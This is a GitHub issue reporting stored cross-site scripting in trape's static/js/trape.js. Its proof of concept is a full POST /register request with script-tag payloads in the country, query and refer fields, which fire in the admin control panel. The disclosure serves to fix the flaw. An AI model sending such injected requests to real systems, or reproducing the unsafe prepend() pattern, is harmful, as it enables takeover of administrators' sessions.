trape icon indicating copy to clipboard operation
trape copied to clipboard
verified publisher icon jofpin

Stored XSS in static/js/trape.js

Open teeann opened this issue 6 years ago • 0 comments

Overview

User input is embedded in admin interface through jQuery's unsafe prepend() method. This leads to Cross-site Scripting attack. The vulnerability is in https://github.com/jofpin/trape/blob/master/static/js/trape.js#L594. The vulnerable parameters are country, query, refer sent in POST /register request.

Proof of concept

  1. python trape.py --url example.com --port 8080
  2. Send the following HTTP request
POST /register HTTP/1.1
Host: <victim_url>	
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 332
Connection: close
Referer: <victim_url>

vId=&vURL=&as=CMS&city=Hanoi&country=<script>alert(1)</script>&countryCode=VN&isp=CMCTELECOM&lat=21.0313&lon=105.8516&org=CMC+Telecom+Infrastructure+Company&query=<script>alert(2)</script>&region=HN&regionName=Hanoi&status=success&timezone=Asia%2FHo_Chi_Minh&zip=&cpu=architecture+%3A+amd64+-+4+Cores&refer=<script>alert(3)</script>
  1. Open the Control Panel link, we see alert() box.

teeann avatar Jun 15 '19 05:06 teeann